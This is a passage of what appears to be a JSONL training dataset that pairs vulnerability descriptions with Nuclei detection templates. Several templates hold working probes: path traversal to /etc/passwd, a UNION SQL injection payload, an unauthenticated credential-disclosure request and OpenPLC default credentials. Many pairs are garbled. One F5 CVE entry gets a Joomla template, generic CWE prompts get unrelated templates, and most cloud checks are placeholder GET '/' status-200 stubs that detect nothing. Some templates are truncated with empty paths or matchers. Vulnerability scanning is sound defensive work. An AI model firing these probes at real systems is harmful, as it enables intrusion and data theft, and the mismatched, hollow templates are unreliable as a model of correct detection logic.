\" \n part: body", "category": "generic", "severity": "info", "id": "api-scrapestack"} +{"instruction": "Generate a Nuclei template for CVE-2022-23178", "input": "Title: Authentication Bypass in crestron hd-md4x2-4k-e_firmware\nSummary: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: crestron hd-md4x2-4k-e_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-23178\n\ninfo:\n name: Crestron Device - Credentials Disclosure\n author: gy741\n severity: critical\n description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.\n tags: cve,cve2022,crestron,disclosure,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/aj.html?a=devi\" \n matchers:\n - type: word\n words:\n - \"\"uname\":\" \n - \"\"upassword\":\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-23178"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: hostuxsocial-mastodon-instance\n\ninfo:\n name: Hostux.social (Mastodon Instance) User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Hostux.social (Mastodon Instance) user name information check was conducted.\n tags: osint,osint-social,hostuxsocial-mastodon-instance,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://hostux.social/api/v1/accounts/lookup?acct={{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"display_name\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Azure Public IP Delete Alert Not Configured", "input": "Title: Azure Public IP Delete Alert Not Configured\nSummary: Azure Public IP Delete Alert Not Configured. Ensure that activity log alerts are used to detect \"Delete Public IP Address\" events within your Microsoft Azure cloud account. An activity log alert gets activated when a new activity log event that matches the condition specified in the alert occurs.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-public-ip-delete-unalerted\n\ninfo:\n name: Azure Public IP Delete Alert Not Configured\n author: princechaddha\n severity: high\n description: Ensure that activity log alerts are used to detect \"Delete Public IP Address\" events within your Microsoft Azure cloud account. An activity log alert gets activated when a new activity log event that matches the condition specified in the alert occurs.\n tags: cloud,devops,azure,microsoft,public-ip,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-public-ip-delete-unalerted"} +{"instruction": "Generate a Nuclei template for: Furtim Malware Hash - Detect", "input": "Title: Furtim Malware Hash - Detect\nSummary: Furtim Malware Hash - Detect. Detects Furtim Parent Malware.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: furtim-malware-hash\n\ninfo:\n name: Furtim Malware Hash - Detect\n author: pussycat0x\n severity: info\n description: Detects Furtim Parent Malware.\n tags: malware,apt,furtim\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "furtim-malware-hash"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: webmodule-ee-panel\n\ninfo:\n name: Webmodule Login Panel - Detect\n author: pussycat0x,daffainfo\n severity: info\n description: Webmodule login panel was detected.\n tags: edb,panel,webmodule-ee,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webmodule-ee/login.seam\" \n matchers:\n - type: word\n words:\n - \"Webmodule\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: HP Device Info Detection", "input": "Title: HP Device Info Detection\nSummary: HP Device Info Detection. Internal info is disclosed to external users in HP Device.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: hp-device-info-detect\n\ninfo:\n name: HP Device Info Detection\n author: pussycat0x\n severity: low\n description: Internal info is disclosed to external users in HP Device.\n tags: iot,hp,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/hp/device/DeviceInformation/View\" \n matchers:\n - type: word\n words:\n - \"Device Information\" \n - \"hp\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "hp-device-info-detect"} +{"instruction": "Generate a Nuclei template for: Apache `mod_proxy_cluster` Cluster Manager Interface - Exposure", "input": "Title: Apache `mod_proxy_cluster` Cluster Manager Interface - Exposure\nSummary: Apache `mod_proxy_cluster` Cluster Manager Interface - Exposure. The Apache mod_proxy_cluster management interface provides administrative control and visibility into the load balancer\u2019s nodes and contexts.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: apache-mod-cluster-exposure\n\ninfo:\n name: Apache `mod_proxy_cluster` Cluster Manager Interface - Exposure\n author: oleveloper\n severity: info\n description: The Apache mod_proxy_cluster management interface provides administrative control and visibility into the load balancer\u2019s nodes and contexts.\n tags: apache,mod_proxy,cluster,exposure,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/mcm\" \n - \"{{BaseURL}}/cluster-manager\" \n - \"{{BaseURL}}/mod_cluster_manager\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "apache-mod-cluster-exposure"} +{"instruction": "Generate a Nuclei template for CVE-2023-35844", "input": "Title: Path Traversal in lightdash lightdash\nSummary: packages/backend/src/routers in Lightdash before 0.510.3 has insecure file endpoints, e.g., they allow .. directory traversal and do not ensure that an intended file extension (.csv or .png) is used.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: lightdash lightdash\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-35844\n\ninfo:\n name: Lightdash version <= 0.510.3 Arbitrary File Read\n author: dwisiswant0\n severity: high\n description: packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n tags: cve,cve2023,lightdash,lfi,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-35844"} +{"instruction": "Generate a Nuclei template for: Filestore Instance Not Protected by VPC Service Controls", "input": "Title: Filestore Instance Not Protected by VPC Service Controls\nSummary: Filestore Instance Not Protected by VPC Service Controls. Ensure that VPC Service Controls are used to configure a security perimeter around your Google Cloud Filestore instances. VPC Service Controls is a powerful security tool that allows you to restrict access to your cloud resources, including Filestore instances, to specific networks and clients. This helps prevent data exfiltration and enhances the security posture of your cloud environment.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-filestore-no-vpc-controls\n\ninfo:\n name: Filestore Instance Not Protected by VPC Service Controls\n author: princechaddha\n severity: medium\n description: Ensure that VPC Service Controls are used to configure a security perimeter around your Google Cloud Filestore instances. VPC Service Controls is a powerful security tool that allows you to restrict access to your cloud resources, including Filestore instances, to specific networks and clients. This helps prevent data exfiltration and enhances the security posture of your cloud environment.\n tags: cloud,devops,gcp,gcloud,filestore,security,networking,vpc,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-filestore-no-vpc-controls"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: sonicwall-sslvpn-panel\n\ninfo:\n name: SonicWall Virtual Office SSL VPN Login Panel - Detect\n author: PR3R00T,johnk3r\n severity: info\n description: SonicWall Virtual Office SSL VPN login panel was detected.\n tags: panel,sonicwall,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/welcome\" \n matchers:\n - type: word\n words:\n - \"Virtual Office\" \n - type: word\n words:\n - \"SonicWALL SSLVPN Web Server\" \n - \"SonicWALL SSL-VPN Web Server\" \n part: header\n condition: or", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: EFS Encryption - Disabled", "input": "Title: EFS Encryption - Disabled\nSummary: EFS Encryption - Disabled. Ensure that the data available on your Amazon EFS file systems is encrypted at rest in order to meet security and compliance requirements.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: efs-encryption-disabled\n\ninfo:\n name: EFS Encryption - Disabled\n author: DhiyaneshDK\n severity: medium\n description: Ensure that the data available on your Amazon EFS file systems is encrypted at rest in order to meet security and compliance requirements.\n tags: cloud,devops,aws,amazon,efs-encryption-disabled,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "efs-encryption-disabled"} +{"instruction": "Generate a Nuclei template for: Wanhu OA DownloadServlet - Remote File Disclosure", "input": "Title: Wanhu OA DownloadServlet - Remote File Disclosure\nSummary: Wanhu OA DownloadServlet - Remote File Disclosure. There is an arbitrary file reading vulnerability in the Wanhu OA DownloadServlet interface. An attacker can use the vulnerability to read sensitive files in the server and obtain sensitive information.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: wanhuoa-downloadservlet-lfi\n\ninfo:\n name: Wanhu OA DownloadServlet - Remote File Disclosure\n author: wpsec\n severity: high\n description: There is an arbitrary file reading vulnerability in the Wanhu OA DownloadServlet interface. An attacker can use the vulnerability to read sensitive files in the server and obtain sensitive information.\n tags: oa,wanhu,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "wanhuoa-downloadservlet-lfi"} +{"instruction": "Generate a Nuclei template for CVE-2022-48197", "input": "Title: Cross-Site Scripting (XSS) in yui_project yui\nSummary: Reflected cross-site scripting (XSS) exists in Sandbox examples in the YUI2 repository. The download distributions, TreeView component and the YUI Javascript library overall are not affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: yui_project yui\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-48197\n\ninfo:\n name: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting\n author: ctflearner\n severity: medium\n description: Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.\n tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}{{paths}}\" \n matchers:\n - type: word\n words:\n - \"1'\"()&%\" \n - \"widget.TreeView\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-48197"} +{"instruction": "Generate a Nuclei template for CVE-2022-41352", "input": "Title: Path Traversal in synacor zimbra_collaboration_suite\nSummary: An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.\nVulnerability Type: Path Traversal\nSeverity: critical\nAffected Products: synacor zimbra_collaboration_suite\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-41352\n\ninfo:\n name: Zimbra Collaboration - Unrestricted File Upload\n author: rxerium\n severity: critical\n description: An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.\n tags: cve,cve2022,zimbra,kev,file-upload,passive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/js/zimbraMail/share/model/ZmSettings.js\" \n matchers:\n - type: word\n words:\n - \"Zimbra Collaboration Suite Web Client\" \n part: body\n - type: word\n words:\n - \"application/x-javascript\" \n part: content_type\n - type: word\n words:\n - \"8.8.15\" \n - \"9.0\" \n part: body\n condition: or", "category": "cve", "severity": "critical", "id": "CVE-2022-41352"} +{"instruction": "Generate a Nuclei template for: SSH Auth Methods - Detection", "input": "Title: SSH Auth Methods - Detection\nSummary: SSH Auth Methods - Detection. SSH (Secure Shell) authentication modes are methods used to verify the identity of users and ensure secure access to remote systems. Common SSH authentication modes include password-based authentication, which relies on a secret passphrase, and public key authentication, which uses cryptographic keys for a more secure and convenient login process. Additionally, multi-factor authentication (MFA) can be employed to enhance security by requiring users to provide multip\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ssh-auth-methods\n\ninfo:\n name: SSH Auth Methods - Detection\n author: Ice3man543\n severity: info\n description: SSH (Secure Shell) authentication modes are methods used to verify the identity of users and ensure secure access to remote systems. Common SSH authentication modes include password-based authentication, which relies on a secret passphrase, and public key authentication, which uses cryptographic keys for a more secure and convenient login process. Additionally, multi-factor authentication (MFA) can be employed to enhance security by requiring users to provide multiple forms of authentication, such as a password and a one-time code.\n tags: js,detect,ssh,enum,network,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "ssh-auth-methods"} +{"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: rocketchat-unauth-access\n\ninfo:\n name: RocketChat Live Chat - Unauthenticated Read Access\n author: rojanrijal\n severity: high\n description: RocketChat Live Chat accepts invalid parameters that could potentially allow unauthenticated access to messages and user tokens.\n tags: rocketchat,unauth,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"{\\\"msg\\\":\\\"result\\\",\\\"result\\\":{\\\"messages\\\"\" \n - \"\"success\":true\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-522"} +{"instruction": "Generate a Nuclei template for CVE-2022-31974", "input": "Title: SQL Injection in online_fire_reporting_system_project online_fire_reporting_system\nSummary: Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: online_fire_reporting_system_project online_fire_reporting_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-31974\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+\" \n matchers:\n - type: word\n words:\n - \"{{md5(num)}}\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-31974"} +{"instruction": "Generate a Nuclei template for: Azure VM Endpoint Protection Not Installed", "input": "Title: Azure VM Endpoint Protection Not Installed\nSummary: Azure VM Endpoint Protection Not Installed. Ensure that all your Microsoft Azure virtual machines (VMs) have endpoint protection installed in order to help you identify and remove viruses, spyware, and other malicious software. The Azure Security Center service monitors the status of anti-malware protection for Azure virtual machines (VMs) and highlights if there is insufficient protection, marking the virtual machines without endpoint protection as vulnerable to malware threats.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-vm-endpoint-protection-missing\n\ninfo:\n name: Azure VM Endpoint Protection Not Installed\n author: princechaddha\n severity: high\n description: Ensure that all your Microsoft Azure virtual machines (VMs) have endpoint protection installed in order to help you identify and remove viruses, spyware, and other malicious software. The Azure Security Center service monitors the status of anti-malware protection for Azure virtual machines (VMs) and highlights if there is insufficient protection, marking the virtual machines without endpoint protection as vulnerable to malware threats.\n tags: cloud,devops,azure,microsoft,endpoint-protection,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-vm-endpoint-protection-missing"} +{"instruction": "Generate a Nuclei template for: USB Storage Devices Not Restricted", "input": "Title: USB Storage Devices Not Restricted\nSummary: USB Storage Devices Not Restricted. Checks if USB storage devices are allowed, potentially introducing security risks through external devices.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: usb-storage-not-restricted\n\ninfo:\n name: USB Storage Devices Not Restricted\n author: princechaddha\n severity: medium\n description: Checks if USB storage devices are allowed, potentially introducing security risks through external devices.\n tags: windows,usb,storage,code,windows-audit\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "usb-storage-not-restricted"} +{"instruction": "Generate a Nuclei template for CVE-2023-23552", "input": "Title: Vulnerability (CWE-400) in f5 big-ip_advanced_web_application_firewall and others\nSummary: On versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.0 before 15.1.8, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when a BIG-IP Advanced WAF or BIG-IP ASM security policy is configured on a virtual server, undisclosed requests can cause an increase in memory resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.\n\nVulnerability Type: Vulnerability (CWE-400)\nSeverity: high\nAffected Products: f5 big-ip_advanced_web_application_firewall, f5 big-ip_application_security_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-23752\n\ninfo:\n name: Joomla! Webservice - Password Disclosure\n author: badboycxcc,Sascha Brendel\n severity: medium\n description: An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.\n tags: cve,cve2023,joomla,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/index.php/v1/config/application?public=true\" \n - \"{{BaseURL}}/api/v1/config/application?public=true\" \n matchers:\n - type: word\n words:\n - \"\"links\":\" \n - \"\"attributes\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n - \"application/vnd.api+json\" \n part: header\n condition: or\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-23552"} +{"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: surrealtodo-lfi\n\ninfo:\n name: Surreal ToDo 0.6.1.2 - Local File Inclusion\n author: arafatansari\n severity: high\n description: Surreal ToDo 0.6.1.2 is vulnerable to local file inclusion via index.php and the content parameter.\n tags: surreal,lfi,edb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?content=../../../../../../../../etc/passwd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} +{"instruction": "Generate a Nuclei template for: Clever Cloud - Subdomain Takeover Detection", "input": "Title: Clever Cloud - Subdomain Takeover Detection\nSummary: Clever Cloud - Subdomain Takeover Detection. Clever Cloud subdomain takeover was detected.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: clever-takeover\n\ninfo:\n name: Clever Cloud - Subdomain Takeover Detection\n author: supr4s\n severity: high\n description: Clever Cloud subdomain takeover was detected.\n tags: takeover,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: word\n words:\n - \"The application you're trying to access doesn't seem to exist\" \n - \"support@clever-cloud.com\" \n part: body\n condition: and", "category": "generic", "severity": "high", "id": "clever-takeover"} +{"instruction": "Generate a Nuclei template for CVE-2022-4260", "input": "Title: Unknown Vulnerability in wp-ban_project wp-ban\nSummary: The WP-Ban WordPress plugin before 1.69.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: wp-ban_project wp-ban\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-4260\n\ninfo:\n name: WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting\n author: Hardik-Solanki\n severity: medium\n description: WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup.\n tags: cve,cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,wp-ban,wp-ban_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2022-4260"} +{"instruction": "Generate a Nuclei template for CVE-2023-33831", "input": "Title: Vulnerability (CWE-77) in frangoteam fuxa\nSummary: A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\nVulnerability Type: Vulnerability (CWE-77)\nSeverity: critical\nAffected Products: frangoteam fuxa\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-33831\n\ninfo:\n name: FUXA - Unauthenticated Remote Code Execution\n author: gy741\n severity: critical\n description: A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Script OK:\" \n part: body_1\n - type: word\n words:\n - \"uid\" \n - \"gid\" \n - \"groups\" \n part: body_2\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2023-33831"} +{"instruction": "Generate a Nuclei template for: DON'T PANIC Traceback", "input": "Title: DON'T PANIC Traceback\nSummary: DON'T PANIC Traceback. DON'T PANIC Traceback was detected.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: dont-panic-traceback\n\ninfo:\n name: DON'T PANIC Traceback\n author: ritikchaddha\n severity: low\n description: DON'T PANIC Traceback was detected.\n tags: traceback,dont-panic,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"most recent call last\" \n - \"Traceback\" \n - \"DON'T PANIC\" \n part: body\n condition: and", "category": "generic", "severity": "low", "id": "dont-panic-traceback"} +{"instruction": "Generate a Nuclei template for CVE-2025-1035", "input": "Title: Path Traversal in CVE-2025-1035\nSummary: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.\nVulnerability Type: Path Traversal\nSeverity: medium\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-1035\n\ninfo:\n name: KLog Server - Path Traversal\n author: s4e-io\n severity: medium\n description: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.\n tags: cve,cve2025,klog-server,lfi,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2025-1035"} +{"instruction": "Generate a Nuclei template for: Progress Kemp LoadMaster Panel - Detect", "input": "Title: Progress Kemp LoadMaster Panel - Detect\nSummary: Progress Kemp LoadMaster Panel - Detect. A Progress Kemp LoadMaster panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: kemp-loadmaster-panel\n\ninfo:\n name: Progress Kemp LoadMaster Panel - Detect\n author: rxerium\n severity: info\n description: A Progress Kemp LoadMaster panel was detected.\n tags: login,progress,kemp,loadmaster,panel,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Kemp Login Screen\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "kemp-loadmaster-panel"} +{"instruction": "Generate a Nuclei template for: Nette Framework Security Checks", "input": "Title: Nette Framework Security Checks\nSummary: Nette Framework Security Checks. A simple workflow that runs all Nette Framework related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: nette-workflow\n\ninfo:\n name: Nette Framework Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all Nette Framework related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "nette-workflow"} +{"instruction": "Generate a Nuclei template for CVE-2024-10516", "input": "Title: Path Traversal in CVE-2024-10516\nSummary: The Swift Performance Lite plugin for WordPress is vulnerable to Local PHP File Inclusion in all versions up to, and including, 2.3.7.1 via the 'ajaxify' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-10516\n\ninfo:\n name: Swift Performance Lite < 2.3.7.2 - Local PHP File Inclusion\n author: ritikchaddha\n severity: high\n description: A vulnerability in Swift Performance Lite before version 2.3.7.2 allows unauthenticated attackers to perform local PHP file inclusion via the 'ajaxify' parameter. This can lead to arbitrary code execution on the server.\n tags: cve,cve2024,wp,wp-plugin,wordpress,swift-performance,lfi,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/wp-content/plugins/swift-performance-lite\" \n part: body\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2024-10516"} +{"instruction": "Generate a Nuclei template for: OpenPLC Webserver v3 - Default Login", "input": "Title: OpenPLC Webserver v3 - Default Login\nSummary: OpenPLC Webserver v3 - Default Login. Identifies default credentials (openplc:openplc) on OpenPLC Webserver v3, allowing unauthorized access to the web interface.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: openplc-default-login\n\ninfo:\n name: OpenPLC Webserver v3 - Default Login\n author: machevalia\n severity: high\n description: Identifies default credentials (openplc:openplc) on OpenPLC Webserver v3, allowing unauthorized access to the web interface.\n tags: openplc,default-login,iot,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Dashboard\" \n - \"Runtime Logs\" \n - \"Logout

